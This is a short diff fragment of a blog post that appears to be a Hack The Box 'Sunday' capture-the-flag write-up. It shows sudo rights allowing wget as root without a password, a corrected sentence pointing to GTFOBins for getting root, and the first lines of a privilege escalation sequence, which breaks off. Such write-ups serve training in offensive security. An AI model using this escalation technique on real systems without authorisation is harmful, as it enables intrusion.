Vorkharium/vorkharium.github.io/_posts/2024-11-04-HTB-Sunday-Write-up.md

     (ALL) ALL
     (root) NOPASSWD: /usr/bin/wget
 ```
-If we visit GTFOBins, we will a way to get root abusing this with the entering the following commands, one line at a time:
+If we visit GTFOBins, we will find a way to get root abusing this entering the following commands, one line at a time:
 ```shell
 TF=$(mktemp)
 chmod +x $TF